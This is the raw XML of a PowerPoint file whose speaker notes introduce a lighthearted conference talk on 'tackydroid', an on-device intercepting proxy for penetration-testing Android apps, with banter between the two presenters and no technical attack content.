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56.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65.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide20.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide62.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47.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide59.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8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide63.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide52.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlid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66.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide55.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide44.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide57.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide60.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56.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide61.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5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60.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57.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64.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6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59.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slides/slide6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31.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId36"/><Relationship Target="slides/slide25.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId30"/><Relationship Target="slides/slide26.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId31"/><Relationship Target="slides/slide66.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId71"/><Relationship Target="slides/slide29.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId34"/><Relationship Target="slides/slide65.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId70"/><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43.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId48"/><Relationship Target="slides/slide42.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId47"/><Relationship Target="slides/slide44.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId49"/><Relationship Target="presProps.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Id="rId2"/><Relationship Target="theme/theme3.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Id="rId1"/><Relationship Target="slides/slide35.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId40"/><Relationship Target="slideMasters/slideMaster1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Id="rId4"/><Relationship Target="slides/slide36.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId41"/><Relationship Target="tableStyles.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Id="rId3"/><Relationship Target="slides/slide37.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId42"/><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41.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId46"/><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 Target="slides/slide53.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId58"/><Relationship Target="slides/slide54.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId59"/><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52.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId57"/><Relationship Target="slides/slide51.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId56"/><Relationship Target="slides/slide50.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId55"/><Relationship Target="slides/slide49.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId54"/><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45.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId50"/><Relationship Target="slides/slide64.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId69"/><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slides/slide16.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId21"/><Relationship Target="slides/slide17.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId22"/><Relationship Target="slides/slide55.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId60"/><Relationship Target="slides/slide18.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId23"/><Relationship Target="slides/slide19.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId24"/><Relationship Target="slides/slide15.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId20"/><Relationship Target="slides/slide61.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId66"/><Relationship Target="slides/slide60.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId65"/><Relationship Target="slides/slide63.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId68"/><Relationship Target="slides/slide62.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId67"/><Relationship Target="slides/slide57.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId62"/><Relationship Target="slides/slide56.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId61"/><Relationship Target="slides/slide59.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId64"/><Relationship Target="slides/slide58.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId63"/></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t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0" marR="0" indent="0" mar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t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" rtl="0" marR="0" indent="0" mar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y="8685213" x="0"/>
            <a:ext cy="457200" cx="2971799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0" marR="0" indent="0" mar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y="8685213" x="3884612"/>
            <a:ext cy="457200" cx="2971799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" rtl="0" marR="0" indent="0" mar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5" name="Shape 95"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Shape 96"/>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MATT</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>hello everybody</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>welcome to “Pentesting Android Application in Style”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Shape 9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1" name="Shape 151"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Shape 152"/>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lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CHRIS&amp;&amp;MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>there actually is no hacker in this picture, they are all writting screen plays</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Shape 15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lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CHRIS&amp;&amp;MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>there actually is no hacker in this picture, they are all writting screen plays</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Shape 16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5" name="Shape 165"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Shape 166"/>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lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CHRIS&amp;&amp;MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>there actually is no hacker in this picture, they are all writting screen plays</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Shape 16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1" name="Shape 171"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Shape 172"/>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CHRIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>//although nobody actually raised their hands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>we know everybody’s image of a hacker is a squirel stting in front of a computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>at least that’s what i think</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>no? no?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Shape 17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7" name="Shape 177"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Shape 178"/>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ＣＨＲＩＳ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Nah just kidding. nowadays when you wanna hack you normally would end up like this, in front of your computer all day.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This is just not right especially everybody’s using a smartphone, which is actually a small computer in your palm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>show us some hands if you are not or never used a smartphone?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>//if someone raises their hand tell them that they are in the wrong talk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="Shape 17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CHRIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>but we really wanna to be this way, cmn people this is a mobile world now</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>why should we get stuck in front of a computer when we have a smaller computer on our palm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>our solution is tackydroid</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Shape 18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0" name="Shape 190"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="Shape 191"/>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MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>i guess you are all wondering what the fuck is tackydroid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Shape 19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6" name="Shape 196"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Shape 197"/>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MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>So exactly what the hell is tacky droid. I don’t really know so I did a google search and here are the results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>But since our application is neither sticky or gaudy it must be in bad taste since we are talking about yet another proxy.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Shape 19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2" name="Shape 202"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Shape 203"/>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lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>but tacky droid is not actually a proxy, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Chris please tell everyone what tacky droid actually is</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Shape 20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7" name="Shape 207"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Shape 208"/>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CHRIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>it’s a proooooooxxxxxxxyyyyyyyyyyyyyyyyyyyyyyyyyyyy with lots of extra x’s and y’s and free giveaways</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="Shape 20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1" name="Shape 101"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Shape 102"/>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MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-before we going into the talk we just want to give you a few warnings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-this is an app that we made our private time to contribute the security world</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-if you are interested ina  talk more focused with android vulnerabilities wanna jmp over to another talk please feel free to leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>if you wanna know about more infor leakage vuln please go to the other talk, it’s awesome</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>but we will stay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Shape 10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2" name="Shape 212"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Shape 21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4" name="Shape 214"/>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MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>so now that your brain is full of fuck to what we are doing we’ll explain a bit about why and how we made an intercepting proxy on the mobile platform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8" name="Shape 218"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="Shape 219"/>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MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>All you really neeed to know about our application is that it’s overlaid</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Shape 22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4" name="Shape 224"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="Shape 225"/>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CHRIS approx 8 minutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>First of all, we created this because we want to save time. We want to have an attacking proxy right inside the android phone, and all you need is to start your target, what you want to hack, maybe an android app or the browser, if you feeling like hacking some web sites, then you are good to go.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>and secondly we are tired of information leakage vulns. And also we wanna be hipsters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>And more tools for the mobile platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>we will get into that in later slides.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="Shape 22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0" name="Shape 230"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="Shape 231"/>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CHRIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>just read through it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>and i also want to use this opportunity to introduce some delicous local cousine to my friend matt here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
